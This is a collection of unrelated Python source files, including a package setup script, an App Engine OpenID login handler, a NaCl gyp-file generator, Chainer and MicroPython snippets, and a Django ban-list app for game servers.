long_description = fp.read()
setup(
name="multicontents",
version="0.3.0",
description="providing contents from multiple sources in jupyter notebook",
long_description_content_type="text/markdown",
long_description=long_description,
url="https://github.com/lydian/multicontents",
author="Lydian Lee",
author_email="lydianly@gmail.com",
maintainer="Lydian Lee",
maintainer_email="lydianly@gmail.com",
packages=find_packages(),
install_requires=["notebook", "ipykernel"],
python_requires=">=3.6",
classifiers=[
"Development Status :: 4 - Beta",
"Environment :: Web Environment",
"Intended Audience :: Developers",
"Natural Language :: English",
"Operating System :: OS Independent",
"Programming Language :: Python",
],
)
|
# Copyright 2011 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import cgi
from model import *
from lib.py.belay import *
from utils import *
from openid import fetchers
from openid.consumer import consumer
from openid.extensions import ax
from gae_openid_store import AppEngineOpenIDStore
import datetime
import logging
import identities
from google.appengine.api import urlfetch
class UrlfetchFetcher(fetchers.HTTPFetcher):
"""An C{L{HTTPFetcher}} that uses AppEngine's urlfetch.
"""
def fetch(self, url, body=None, headers=None):
if headers is None:
headers = {}
headers.setdefault(
'User-Agent',
"%s Python-urlfetch" % (fetchers.USER_AGENT))
f = urlfetch.fetch(url,
method=(urlfetch.POST if body else urlfetch.GET),
headers=headers,
payload=body,
validate_certificate=True)
resp = fetchers.HTTPResponse()
resp.body = f.content
resp.final_url = f.final_url or url
resp.headers = f.headers
resp.status = f.status_code
return resp
fetchers.setDefaultFetcher(UrlfetchFetcher())
EMAIL_ATTR = 'http://axschema.org/contact/email'
VERIFIED_EMAIL_ATTR = 'http://axschema.org/contact/verifiedemail'
NAME_ATTR = 'http://axschema.org/namePerson'
FIRST_NAME_ATTR = 'http://axschema.org/namePerson/first'
LAST_NAME_ATTR = 'http://axschema.org/namePerson/last'
FRIENDLY_NAME_ATTR = 'http://axschema.org/namePerson/friendly'
GENDER_ATTR = 'http://axschema.org/person/gender'
BIRTH_DATE_ATTR = 'http://axschema.org/birthDate'
AVATAR_ATTR = 'http://axschema.org/media/image/default'
class LaunchHandler(CapHandler):
def get(self):
c = consumer.Consumer({}, AppEngineOpenIDStore())
auth_request = c.begin(self.discoveryUrl())
auth_request.addExtension(self.buildAttributeRequest())
callback = self.callbackUrl()
realm = self.server_url('')
form = auth_request.formMarkup(realm, callback, False, {})
reply = {
'page': { 'html': self.server_url('/addOpenId.html') },
'info': {
'formContent': form
}
}
self.bcapResponse(reply)
def callbackUrl(self):
station = self.get_entity()
return self.cap_server.regrant(self.callbackClass(), station).serialize()
def buildAttributeRequest(self):
ax_request = ax.FetchRequest()
attributes = [
EMAIL_ATTR,
VERIFIED_EMAIL_ATTR,
NAME_ATTR,
FIRST_NAME_ATTR,
LAST_NAME_ATTR,
FRIENDLY_NAME_ATTR,
GENDER_ATTR,
BIRTH_DATE_ATTR,
AVATAR_ATTR,
]
for attr in attributes:
ax_request.add(ax.AttrInfo(attr, required=True))
return ax_request
# TODO(mzero): These should be doing discovery to find the endpoint URLs
class GoogleLaunchHandler(LaunchHandler):
def discoveryUrl(self):
return 'https://www.google.com/accounts/o8/id'
def callbackClass(self):
return GoogleCallbackHandler
class YahooLaunchHandler(LaunchHandler):
def discoveryUrl(self):
return 'https://yahoo.com/'
def callbackClass(self):
return YahooCallbackHandler
class AolLaunchHandler(LaunchHandler):
def discoveryUrl(self):
return 'http://aol.com/'
def callbackClass(self):
return AolCallbackHandler
def stripPrefix(prefix, s):
if s.startswith(prefix):
return s[len(prefix):]
else:
return None
def extractAliases(prefix, args):
r = dict()
for (k, v) in args.iteritems():
a = stripPrefix(prefix, k)
if a:
r[v] = a
return r
def permuteAttributes(ax):
# reform attributes from AX names and format to our names and format
attrs = dict()
v = []
v.extend(ax.data.get(NAME_ATTR, []))
v.extend(ax.data.get(FRIENDLY_NAME_ATTR, []))
fns = ax.data.get(FIRST_NAME_ATTR, [])
lns = ax.data.get(LAST_NAME_ATTR, [])
v.extend([f + ' ' + l for (f, l) in zip(fns,lns)])
# not clear if the first and last name values sets are 'aligned' like this
if v:
attrs['name'] = v
v = []
v.extend(ax.data.get(VERIFIED_EMAIL_ATTR, []))
v.extend(ax.data.get(EMAIL_ATTR, []))
if v:
attrs['email'] = v
v = []
v.extend(ax.data.get(AVATAR_ATTR, []))
if v:
attrs['image'] = v
if GENDER_ATTR in ax.data:
gender = ax.data.get(GENDER_ATTR)[0]
if gender == 'M':
attrs['gender'] = ['male']
elif gender == 'F':
attrs['gender'] = ['female']
else:
attrs['gender'] = ['other']
v = []
v.extend(ax.data.get(BIRTH_DATE_ATTR, []))
if v:
ages = []
for d in v:
try:
bdate = datetime.datetime.strptime(d, "%Y-%m-%d")
now = datetime.datetime.today()
age = now.year - bdate.year
if (now.month < bdate.month or
(now.month == bdate.month and now.day < bdate.day)):
age -= 1
ages.append(str(age))
except:
pass
attrs['age'] = ages
return attrs
class CallbackHandler(CapHandler):
def get(self):
self.handleOpenIdResponse(self.request.GET)
def post(self):
self.handleOpenIdResponse(self.request.POST)
def handleOpenIdResponse(self, args):
c = consumer.Consumer({}, AppEngineOpenIDStore())
result = c.complete(args, self.server_url(self.requestPath()))
if result.status == consumer.SUCCESS:
ax_response = ax.FetchResponse.fromSuccessResponse(result)
self.handleSuccess(result.identity_url, ax_response)
else: # NOTE(mzero): generally result.status == consumer.FAILURE
self.handleFailure(result.message)
def handleSuccess(self, identity_url, ax_response):
self.addIdentity(identity_url, ax_response)
page = self.buildClosePage()
#page = self.buildDebuggingPage(args, attrs)
self.writeOutPage(page);
def handleFailure(self, message):
logging.getLogger().info('openid request failed: %s' % message)
page = self.buildFailPage()
self.writeOutPage(page);
def writeOutPage(self, page):
self.response.headers["Cache-Control"] = "no-cache"
self.response.headers["Expires"] = "Fri, 01 Jan 1990 00:00:00 GMT"
self.response.content_type = "text/html;charset=UTF-8"
self.response.body = page
def addIdentity(self, identity_url, ax_response):
station = self.get_entity()
if ax_response:
attrs = permuteAttributes(ax_response)
else:
attrs = {}
IdentityData(
parent=station,
id_type='openid',
id_provider=self.provider(),
account_name=identity_url,
display_name=attrs.get('name', [None])[0],
attributes=json.dumps(attrs)
).put()
def buildDebuggingPage(self, args, attrs):
page = "<html><body>"
page += "<h1>results</h1><dl>"
for (k, v) in args.iteritems():
page += "<dt>" + cgi.escape(k) + "</dt><dd>" + cgi.escape(v) + "</dd>"
page += "</dl>"
page += "<h1>attributes</h1><dl>"
for (k, v) in attrs.iteritems():
page += "<dt>" + cgi.escape(k) + "</dt><dd>" + cgi.escape(' -- '.join(v)) + "</dd>"
page += "</dl>"
page += "</body></html>"
return page
def buildClosePage(self):
return '''<html>
<body><h1>Done!</h1>
<script>
window.opener.postMessage('done', '*');
setTimeout(function() { window.close(); }, 50);
</script></body>
</html>'''
def buildFailPage(self):
return '''<html>
<body><h1>Failed!</h1>
<p>The request to authenticate with your identity provider failed. You
may close this window when ready.</p>
<script>
window.opener.postMessage('done', '*');
</script></body>
</html>'''
def requestPath(self):
return self.request.path_info_cap
class GoogleCallbackHandler(CallbackHandler):
def provider(self):
return identities.GOOGLE_PROVIDER
class YahooCallbackHandler(CallbackHandler):
def provider(self):
return identities.YAHOO_PROVIDER
class AolCallbackHandler(CallbackHandler):
def provider(self):
return identities.AOL_PROVIDER
class LoginCallbackHandler(CallbackHandler):
def handleSuccess(self, identity_url, ax_response):
q = IdentityData.all()
q.filter('id_type =', 'openid')
q.filter('id_provider =', self.provider())
q.filter('account_name =', identity_url)
results = [ r for r in q.fetch(2) ]
page = ''
if len(results) == 0:
logging.getLogger().debug('new station for: %s' % identity_url)
station = StationData.create()
self.set_entity(station)
self.addIdentity(identity_url, ax_response)
page = self.buildStationPage(
"New Station",
"""A new station has been created for you.
Use this same identity to get back to it.""",
station.key())
elif len(results) == 1:
logging.getLogger().debug('login for: %s' % identity_url)
identity = results[0]
if ax_response:
attrs = permuteAttributes(ax_response)
identity.attributes = json.dumps(attrs)
identity.put()
station = identity.parent()
self.set_entity(station)
page = self.buildStationPage(
"Station Login",
"""We have your station.""",
station.key())
else:
logging.getLogger().debug('multiple stations for: %s' % identity_url)
self.writeOutPage(page);
page = self.buildMultipleStationPage()
self.writeOutPage(page);
def requestPath(self):
return self.request.path_info
def buildStationPage(self, header, message, stationKey):
return '''<html>
<head>
<title>{header}</title>
<script src="/lib/js/include-belay.js"></script>
</head>
<body><h1>{header}</h1>
<p>{message}</p>
<script>
localStorage.setItem('launchCap', '{url}');
localStorage.setItem('launchCap-authenticated-time', Date.now());
window.close();
</script></body>
</html>'''.format(
header=header, message=message, url=self.server_url(launch_path(stationKey)))
def buildMultipleStationPage(self):
return '''<html>
<body><h1>Multiple Stations</h1>
<p>That identity is associated with multiple stations.</p>
<script>
window.opener.postMessage('done', '*');
</script></body>
</html>'''
# TODO(mzero): these callbackUrl() calls must match the map in station.py
class GoogleLoginLaunchHandler(GoogleLaunchHandler):
def callbackUrl(self):
return self.server_url("/login/openid/google/callback")
class YahooLoginLaunchHandler(YahooLaunchHandler):
def callbackUrl(self):
return self.server_url("/login/openid/yahoo/callback")
class AolLoginLaunchHandler(AolLaunchHandler):
def callbackUrl(self):
return self.server_url("/login/openid/aol/callback")
class GoogleLoginCallbackHandler(LoginCallbackHandler):
def provider(self):
return identities.GOOGLE_PROVIDER
class YahooLoginCallbackHandler(LoginCallbackHandler):
def provider(self):
return identities.YAHOO_PROVIDER
class AolLoginCallbackHandler(LoginCallbackHandler):
def provider(self):
return identities.AOL_PROVIDER
def loginIdentityHandlers():
return
|
import ompc
from ompclib.ompclib_numpy import _marray, _size, _dtype
def build_return(nargout, *args):
ret = []
for x in args[:nargout]:
if isinstance(x, _marray): ret += [ x ]
else: ret += [ _marray(_dtype(x), _size(x), x) ]
if len(ret) == 1:
ret = ret[0]
return ret
def func1():
nargout = 1
a, b = 1, 2
return build_return(nargout, a, b)
def func2():
nargout = 2
a, b = [1,2,3], [[2]]
return build_return(nargout, a, b)
from ompc import byteplay
c1 = byteplay.Code.from_code(func1.func_code)
c2 = byteplay.Code.from_code(func2.func_code)
print c1.code
print c2.code
print func1()
a, b = func2()
print a
print b
|
# Import required MicroPython libraries.
from usys import stdin
from uselect import poll
# Register the standard input so we can read keyboard presses.
keyboard = poll()
keyboard.register(stdin)
while True:
# Check if a key has been pressed.
if keyboard.poll(0):
# Read the key and print it.
key = stdin.read(1)
print("You pressed:", key)
|
#!/usr/bin/env python
# Copyright (c) 2012 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import StringIO
import sys
import os
import optparse
SCRIPT_DIR = os.path.dirname(os.path.abspath(__file__))
sys.path.append(os.path.join(os.path.dirname(SCRIPT_DIR), 'tools'))
import getos
valid_tools = ['newlib', 'glibc', getos.GetPlatform()]
def Error(msg):
print(msg)
sys.exit(1)
PREAMBLE = """\
{
'includes': ['%s/build_tools/nacl.gypi'],
"""
NEXE_TARGET = """\
{
'target_name': '%(NAME)s_x86_32%(EXT)s',
'product_name': '%(NAME)s_x86_32%(EXT)s',
'type': '%(GYP_TYPE)s',
'sources': %(SOURCES)s,
'libraries': %(LIBS)s,
'include_dirs': %(INCLUDES)s,
'cflags': ['-m32', '-pedantic'] + %(CFLAGS)s,
'make_valid_configurations': ['newlib-debug', 'newlib-release',
'glibc-debug', 'glibc-release'],
'ldflags': ['-m32', '-L../../lib/x86_32/<(CONFIGURATION_NAME)'],
'toolset': 'target',
%(CONFIGS)s
},
{
'target_name': '%(NAME)s_x86_64%(EXT)s',
'product_name': '%(NAME)s_x86_64%(EXT)s',
'type': '%(GYP_TYPE)s',
'sources': %(SOURCES)s,
'libraries': %(LIBS)s,
'include_dirs': %(INCLUDES)s,
'make_valid_configurations': ['newlib-debug', 'newlib-release',
'glibc-debug', 'glibc-release'],
'cflags': ['-m64', '-pedantic'] + %(CFLAGS)s,
'ldflags': ['-m64', '-L../../lib/x86_64/<(CONFIGURATION_NAME)'],
'toolset': 'target',
%(CONFIGS)s
},
"""
NLIB_TARGET = """\
{
'target_name': '%(NAME)s_x86_32%(EXT)s',
'product_name': 'lib%(NAME)s%(EXT)s',
'product_dir': '../../lib/x86_32/<(CONFIGURATION_NAME)',
'type': '%(GYP_TYPE)s',
'sources': %(SOURCES)s,
'libraries': %(LIBS)s,
'include_dirs': %(INCLUDES)s,
'cflags': ['-m32', '-pedantic'] + %(CFLAGS)s,
'make_valid_configurations': ['newlib-debug', 'newlib-release',
'glibc-debug', 'glibc-release'],
'ldflags': ['-m32'],
'toolset': 'target',
%(CONFIGS)s
},
{
'target_name': '%(NAME)s_x86_64%(EXT)s',
'product_name': 'lib%(NAME)s%(EXT)s',
'product_dir': '../../lib/x86_64/<(CONFIGURATION_NAME)',
'type': '%(GYP_TYPE)s',
'sources': %(SOURCES)s,
'libraries': %(LIBS)s,
'include_dirs': %(INCLUDES)s,
'make_valid_configurations': ['newlib-debug', 'newlib-release',
'glibc-debug', 'glibc-release'],
'cflags': ['-m64', '-pedantic'] + %(CFLAGS)s,
'ldflags': ['-m64'],
'toolset': 'target',
%(CONFIGS)s
},
"""
HOST_LIB_TARGET = """\
{
'target_name': '%(NAME)s%(EXT)s',
'type': '%(GYP_TYPE)s',
'toolset': 'host',
'sources': %(SOURCES)s,
'cflags': %(CFLAGS)s,
'cflags_c': ['-std=gnu99'],
'include_dirs': %(INCLUDES)s,
'make_valid_configurations': ['host-debug', 'host-release'],
'product_dir': '../../lib/%(ARCH)s/<(CONFIGURATION_NAME)',
'product_name': '%(NAME)s%(EXT)s',
%(CONFIGS)s
},
"""
HOST_EXE_TARGET = """\
{
'target_name': '%(NAME)s%(EXT)s',
'type': '%(GYP_TYPE)s',
'toolset': 'host',
'sources': %(SOURCES)s,
'cflags': %(CFLAGS)s,
'cflags_c': ['-std=gnu99'],
'ldflags': ['-L../../lib/%(ARCH)s/<(CONFIGURATION_NAME)'],
'libraries': %(LIBS)s,
'include_dirs': %(INCLUDES)s,
'make_valid_configurations': ['host-debug', 'host-release'],
'msvs_settings': {
'VCLinkerTool': {
'AdditionalLibraryDirectories':
['../../lib/%(ARCH)s/<(CONFIGURATION_NAME)'],
}
},
%(CONFIGS)s
},
"""
NMF_TARGET = """\
{
'target_name': '%(NAME)s_%(TOOLCHAIN)s.nmf',
'product_name': '%(NAME)s.nmf',
'product_dir': '<(PRODUCT_DIR)/%(TOOLCHAIN)s',
'type': 'none',
'make_valid_configurations': ['%(TOOLCHAIN)s-debug', '%(TOOLCHAIN)s-release'],
'actions': [
{
'action_name': 'nmf',
'inputs': ['<(PRODUCT_DIR)/%(NAME)s_x86_32.nexe',
'<(PRODUCT_DIR)/%(NAME)s_x86_64.nexe'] + %(SODEPS)s,
'outputs': ['<(PRODUCT_DIR)/%(NAME)s.nmf'],
'action': ['../../tools/create_nmf.py', '-t', '%(TOOLCHAIN)s', '-s',
'<(PRODUCT_DIR)'] + %(NMFACTION)s,
},
]
},
"""
TOOLCHAIN_CONFIG = """\
'%(toolchain)s-release' : {
'cflags' : ['-O2'],
},
'%(toolchain)s-debug' : {
'cflags' : ['-g', '-O0'],
},
"""
NEXE_CONFIG = """\
'%(toolchain)s-release' : {
'cflags' : ['--%(toolchain)s', '-O2',
'-idirafter', '../../include'],
'ldflags' : ['--%(toolchain)s'],
'arflags' : ['--%(toolchain)s'],
},
'%(toolchain)s-debug' : {
'cflags' : ['--%(toolchain)s', '-g', '-O0',
'-idirafter', '../../include'],
'ldflags' : ['--%(toolchain)s'],
'arflags' : ['--%(toolchain)s'],
},
"""
WIN32_CONFIGS = """\
'target_defaults': {
'default_configuration': 'Debug_PPAPI',
'configurations': {
'Debug_PPAPI': {
'msvs_configuration_platform': 'PPAPI',
'msbuild_configuration_attributes': {
'ConfigurationType': 'DynamicLibrary'
},
'include_dirs': ['../../include/win'],
'defines': ['_WINDOWS', '_DEBUG', 'WIN32'],
},
'Release_PPAPI': {
'msvs_configuration_platform': 'PPAPI',
'msbuild_configuration_attributes': {
'ConfigurationType': 'DynamicLibrary'
},
'include_dirs': ['../../include/win'],
'defines': ['_WINDOWS', 'NDEBUG', 'WIN32'],
},
'Debug_NaCl': {
'msvs_configuration_platform': 'NaCl',
'msbuild_configuration_attributes': {
'ConfigurationType': 'Application'
},
},
'Release_NaCl': {
'msvs_configuration_platform': 'NaCl',
'msbuild_configuration_attributes': {
'ConfigurationType': 'Application'
},
},
},
},
"""
def WriteNaClTargets(output, target, tools):
configs = "'configurations' : {\n"
for tc in tools:
if tc not in valid_tools:
continue
if tc in ['newlib', 'glibc']:
configs += NEXE_CONFIG % {'toolchain': tc}
configs += " }"
target['CONFIGS'] = configs
if target['TYPE'] == 'lib':
output.write(NLIB_TARGET % target)
else:
output.write(NEXE_TARGET % target)
def ConfigName(toolchain):
if toolchain == getos.GetPlatform():
return 'host'
else:
return toolchain
def ProcessDSC(filename, outfile=None):
if not os.path.exists(filename):
Error("file not found: %s" % filename)
desc = open(filename).read()
desc = eval(desc, {}, {})
if not desc.get('TARGETS'):
Error("no TARGETS found in dsc")
if not outfile:
outfile = desc['NAME'] + '.gyp'
outfile = os.path.join(os.path.dirname(filename), outfile)
output = StringIO.StringIO()
srcdir = os.path.dirname(SCRIPT_DIR)
output.write(PREAMBLE % srcdir.replace("\\", '/'))
win32 = sys.platform in ('win32', 'cygwin')
if win32:
output.write(WIN32_CONFIGS)
else:
for tc in desc['TOOLS']:
if tc in valid_tools:
default = '%s-debug' % ConfigName(tc)
break
output.write("""\
'target_defaults': {
'default_configuration': '%s',
'configurations' : {\n""" % default)
for tc in desc['TOOLS']:
if tc not in valid_tools:
continue
output.write(TOOLCHAIN_CONFIG % {'toolchain': ConfigName(tc)})
output.write(" }\n },\n")
output.write("\n 'targets': [\n")
# make a list of all the so target names so that the nmf rules
# can depend on them all
sofiles = []
soremap = []
for target in desc['TARGETS']:
if target['TYPE'] == 'so':
name = target['NAME']
sofiles.append('<(PRODUCT_DIR)/%s_x86_64.so' % name)
sofiles.append('<(PRODUCT_DIR)/%s_x86_32.so' % name)
soremap += ['-n', '%s_x86_64.so,%s.so' % (name, name)]
soremap += ['-n', '%s_x86_32.so,%s.so' % (name, name)]
# iterate through dsc targets generating gyp targets
for target in desc['TARGETS']:
target.setdefault('INCLUDES', [])
target['INCLUDES'] = [x.replace("$(NACL_SDK_ROOT)", "../..")
for x in target['INCLUDES']]
libs = target.get('LIBS', [])
if win32:
libs = [l for l in libs if l not in ('ppapi', 'ppapi_cpp')]
target['LIBS'] = ['-l' + l + '.lib' for l in libs]
else:
target['LIBS'] = ['-l' + l for l in libs]
if target['TYPE'] == 'so':
if win32:
target['EXT'] = ''
else:
target['EXT'] = '.so'
target['GYP_TYPE'] = 'shared_library'
elif target['TYPE'] == 'lib':
if win32:
target['EXT'] = ''
else:
target['EXT'] = '.a'
target['GYP_TYPE'] = 'static_library'
elif target['TYPE'] == 'main':
target['EXT'] = '.nexe'
target['GYP_TYPE'] = 'executable'
else:
Error("unknown type: %s" % target['TYPE'])
target['CFLAGS'] = target.get('CXXFLAGS', [])
if not win32 and ('newlib' in desc['TOOLS'] or 'glibc' in desc['TOOLS']):
WriteNaClTargets(output, target, desc['TOOLS'])
if target['TYPE'] == 'main':
target['SODEPS'] = sofiles
target['NMFACTION'] = ['-o', '<@(_outputs)', '-L<(NMF_PATH1)',
'-L<(NMF_PATH2)', '-D', '<(OBJDUMP)',
'<@(_inputs)']
target['NMFACTION'] += soremap
if 'newlib' in desc['TOOLS']:
target['TOOLCHAIN'] = 'newlib'
output.write(NMF_TARGET % target)
if 'glibc' in desc['TOOLS']:
target['TOOLCHAIN'] = 'glibc'
output.write(NMF_TARGET % target)
if win32 or getos.GetPlatform() in desc['TOOLS']:
target['ARCH'] = 'x86_32'
target['INCLUDES'].append('../../include')
if win32:
target['HOST'] = 'win'
target['CONFIGS'] = ''
target['CFLAGS'] = []
else:
target['CONFIGS'] = ''
target['HOST'] = 'linux'
target['CFLAGS'].append('-fPIC')
if target['TYPE'] == 'main':
target['GYP_TYPE'] = 'shared_library'
if win32:
target['EXT'] = ''
else:
target['EXT'] = '.so'
output.write(HOST_EXE_TARGET % target)
else:
output.write(HOST_LIB_TARGET % target)
output.write(' ],\n}\n')
print('Writing: ' + outfile)
open(outfile, 'w').write(output.getvalue())
def main(args):
parser = optparse.OptionParser()
parser.add_option('-o', help='Set output filename.', dest='output')
options, args = parser.parse_args(args)
if not args:
Error('No .dsc file specified.')
if options.output:
outdir = os.path.dirname(options.output)
if not os.path.exists(outdir):
os.makedirs(outdir)
assert len(args) == 1
ProcessDSC(args[0], options.output)
return 0
if __name__ == '__main__':
sys.exit(main(sys.argv[1:]))
|
# Copyright 2021 UW-IT, University of Washington
# SPDX-License-Identifier: Apache-2.0
"""
Module encapsulates the interactions with the uw_gws,
valid endorser authorization test
Valid endorsers are defined as being in the GWS group defined
by VALID_ENDORSER_GROUP. Unless defined in settings, the group
used for validation is "uw_employee"
"""
from endorsement.util.log import log_exception
from restclients_core.exceptions import DataFailureException
from uw_gws import GWS
import logging
import traceback
logger = logging.getLogger(__name__)
gws = GWS()
def is_group_member(uwnetid, group):
"""
Return True if the netid is in the specified group
"""
try:
return gws.is_effective_member(group, uwnetid)
except DataFailureException as ex:
if ex.status == 404:
return False
log_exception(logger,
'{0} is_effective_member of {1} group'.format(
uwnetid, group),
traceback.format_exc())
raise
|
# coding: utf-8
import chainer
import chainer.functions as F
class Default(chainer.Chain):
def __init__(self):
super(Default, self).__init__()
def forward(self, x):
y1 = F.leaky_relu(x)
return y1
class Slope(chainer.Chain):
def __init__(self):
super(Slope, self).__init__()
def forward(self, x):
y1 = F.leaky_relu(x, slope=0.1)
return y1
# ======================================
from chainer_compiler.elichika import testtools
import numpy as np
def main():
x = np.random.rand(6, 4).astype(np.float32) - 0.5
testtools.generate_testcase(Default(), [x])
testtools.generate_testcase(Slope(), [x], subname='slope')
if __name__ == '__main__':
main()
|
from .functions import evaluate, init_params, train # NOQA
|
# coding: utf-8
from django.shortcuts import render, get_object_or_404
#from social.apps.django_app.default.models import UserSocialAuth
from social_django.models import UserSocialAuth
from djangobb_forum.models import Profile
from django.http import HttpResponseRedirect, HttpResponse
from django.core.paginator import Paginator, EmptyPage, PageNotAnInteger
import time
from django.contrib import messages
from django.utils.translation import ugettext as _
from django.urls import reverse
from .forms import BanForm, UnbanForm, CommentForm, RebanForm
from .models import Ban, Comment
from django.contrib.auth.decorators import login_required
from django.db.models import Q
# Base steamid
steamid64ident = 76561197960265728
def getSteam64FromString(steamid):
steam64id = 76561197960265728
id_split = steamid.split(":")
try:
steam64id += int(id_split[2]) * 2 # again, not sure why multiplying by 2...
except (IndexError, ValueError):
return "Invalid Steam ID"
if id_split[1] == "1":
steam64id += 1
return steam64id
def getSteam3FromString(steamid):
# X = int(steamid[6:7])
Y = int(steamid[8:9])
Z = int(steamid[10:])
steam3 = "[U:{}:{}]".format( Y, Z*2 + Y )
return steam3
def commid_to_steamid(commid):
steamid = []
steamid.append('STEAM_0:')
steamidacct = int(commid) - steamid64ident
steamid.append('0:') if steamidacct % 2 == 0 else steamid.append('1:')
steamid.append(str(steamidacct // 2))
return ''.join(steamid)
def commid_to_steam3(commid):
difference = int(commid) - steamid64ident
Y = 0 if difference % 2 == 0 else 1
# return "[U:{}:{}]".format( Y, difference + Y)
return "[U:{}:{}]".format(Y, difference)
def index(request):
unban_form = UnbanForm()
comment_form = CommentForm()
reban_form = RebanForm()
query = request.GET.get('q')
if query:
bans = Ban.objects.filter(Q(name__icontains=query) | Q(authid=query)).distinct()
else:
bans = Ban.objects.all()
num_bans = bans.count()
# Show 16 bans per page.
paginator = Paginator(bans, 16)
page = request.GET.get('page')
try:
bans = paginator.page(page)
except PageNotAnInteger:
# If page is not an integer, deliver first page.
bans = paginator.page(1)
except EmptyPage:
# If page is out of range (e.g. 9999), deliver last page of results.
bans = paginator.page(paginator.num_pages)
# Get the logged-in user
if request.user.is_authenticated():
username = request.user.username
else:
username = ""
for ban in bans:
parseBan(ban)
return render(request, 'bans/ban_list.html', {'bans': bans,
'num_bans': num_bans,
'username': username,
'unban_form': unban_form,
'reban_form': reban_form,
'comment_form': comment_form})
def search(request):
unban_form = UnbanForm()
comment_form = CommentForm()
reban_form = RebanForm()
if not 'user' in request.GET or (request.GET.get("user") == ""):
messages.error(request, _("Please specify a user to search for."))
return render(request, 'bans/ban_search.html')
else:
try:
bans = Ban.objects.filter(authid=request.GET.get("user"))
count = bans.count()
socialAuthUserID = UserSocialAuth.objects.get(uid=request.GET.get("user")).user_id
# name = Profile.objects.get(user_id=socialAuthUserID).user.username
except UserSocialAuth.DoesNotExist:
if count == 0:
messages.error(request, _("This user does not exist."))
return render(request, 'bans/ban_search.html')
messages.warning(request, _("This user's STEAM account is not linked to a Thicc Gaming Account."))
if count == 0:
messages.warning(request, _("This user has no previous bans."))
return render(request, 'bans/ban_search.html')
else:
paginator = Paginator(bans, 16) # Show 12 contacts per page.
page = request.GET.get('page')
try:
bans = paginator.page(page)
except PageNotAnInteger:
# If page is not an integer, deliver first page.
bans = paginator.page(1)
except EmptyPage:
# If page is out of range (e.g. 9999), deliver last page of results.
bans = paginator.page(paginator.num_pages)
current_url = request.get_full_path()
if '&' in current_url:
current_url = current_url[:current_url.index('&')]
for ban in bans:
parseBan(ban)
return render(request, 'bans/ban_search.html', {'bans': bans,
'count': count,
# 'name': name,
'full_path': current_url,
'unban_form': unban_form,
'reban_form': reban_form,
'comment_form': comment_form,})
def parseBan(ban):
# Set the ban's respective user
ban.steam3 = commid_to_steam3(ban.authid)
ban.steamID = commid_to_steamid(ban.authid)
try:
socialAuthUserID = UserSocialAuth.objects.get(uid=ban.authid).user_id
ban.user = Profile.objects.get(user_id=socialAuthUserID)
except UserSocialAuth.DoesNotExist:
ban.nouser = "STEAM account not linked to a Thicc Gaming account."
# Format the ban's length
c = ban.length
days = int(c / 86400)
hours = int(c / 3600) % 24
minutes = int(c / 60) % 60
seconds = int(c % 60)
if days != 0 and hours != 0 and minutes != 0:
ban.length = "{} d, {} hr, {} min".format(days, hours, minutes)
elif days != 0 and hours != 0:
ban.length = "{} d, {} hr".format(days, hours)
elif days != 0:
ban.length = "{} d".format(days)
elif hours != 0 and minutes != 0:
ban.length = "{} hr, {} min".format(hours, minutes, seconds)
elif hours != 0:
ban.length = "{} hr".format(hours)
elif minutes != 0 and seconds != 0:
ban.length = "{} min, {} sec".format(minutes, seconds)
elif minutes != 0:
ban.length = "{} min".format(minutes)
elif seconds != 0:
ban.length = "{} sec".format(seconds)
else:
ban.length = "Permanent"
# Get the datetime of the created and end epochs
ban.createdDate = time.strftime('%m-%d-%Y %H:%M:%S', time.localtime(ban.created))
ban.endDate = time.strftime('%m-%d-%Y %H:%M:%S', time.localtime(ban.ends))
# Get the total bans for the user
ban.totalBans = Ban.objects.filter(authid=ban.authid).count()
# Set ban's respective admin forum-profile.
if ban.aid != 0:
try:
ban.adminUser = Profile.objects.get(user_id=ban.aid)
except Profile.DoesNotExist:
ban.adminUser = ""
# Set ban's expired state.
if ban.ends < int(time.time()) and ban.length != "Permanent":
ban.expired = True
else:
ban.expired = False
# Set ban's game.
if ban.sid == 1:
ban.game = "Left 4 THICC 2"
ban.topic = 16
elif ban.sid == 2:
ban.game = "THICC | ZS"
ban.topic = 16
elif ban.sid == 3:
ban.game = "thicc Scape"
ban.topic = 16
elif ban.sid == 4:
ban.game = "THICC | JB"
ban.topic = 16
elif ban.sid == 5:
ban.game = "THICC WoW"
ban.topic = 16
else:
ban.game = "Thicc Scape"
ban.topic = 16
if ban.RemoveType == 'U':
ban.unbanned = True
ban.RemovedOn = time.strftime('%m-%d-%Y %H:%M:%S', time.localtime(ban.RemovedOn))
try:
ban.unbannedAdmin = Profile.objects.get(user_id=ban.RemovedBy)
except Profile.DoesNotExist:
ban.unbannedAdmin = "Admin has since been removed."
# Get this ban's comments
ban.commentss = Comment.objects.filter(ban=ban)
if ban.commentss.count() == 0:
ban.commentss = False
@login_required
def unban(request, bid):
ban = get_object_or_404(Ban, bid=bid)
if request.method == 'POST':
if not request.user.is_superuser:
# messages.error(request, "You are not a staff member. This action has been logged.")
return HttpResponseRedirect(reverse('bans:index'))
else:
# ban = get_object_or_404(Ban, bid=bid)
form = UnbanForm(request.POST, instance=ban)
if form.is_valid():
ban = form.save(commit=False)
ban.RemovedBy = request.user.id
ban.RemovedOn = time.time()
ban.RemoveType = 'U'
ban.save()
# Always return an HttpResponseRedirect after successfully dealing
# with POST data. This prevents data from being posted twice if a
# user hits the Back button.
return HttpResponseRedirect(reverse('bans:index'))
@login_required
def get_client_ip(request):
x_forwarded_for = request.META.get('HTTP_X_FORWARDED_FOR')
if x_forwarded_for:
ip = x_forwarded_for.split(',')[0]
else:
ip = request.META.get('REMOTE_ADDR')
return ip
@login_required
def ban(request):
if request.user.is_authenticated and request.user.is_staff:
if request.method == "POST":
form = BanForm(request.POST)
if form.is_valid():
ban = form.save(commit=False)
ban.aid = request.user.id
ban.created = int(time.time())
ban.ends = ban.created + ban.length
ban.adminIp = get_client_ip(request)
ban.RemovedBy = 0
ban.RemovedOn = 0
ban.type = 0
ban.save()
messages.success(request, "Ban successfully added.")
else:
return render(request, 'bans/ban_details.html', {'form': form})
else:
form = BanForm()
return render(request, 'bans/ban_details.html', {'form':form})
else:
form = BanForm()
return render(request, 'bans/ban_details.html', {'form':form})
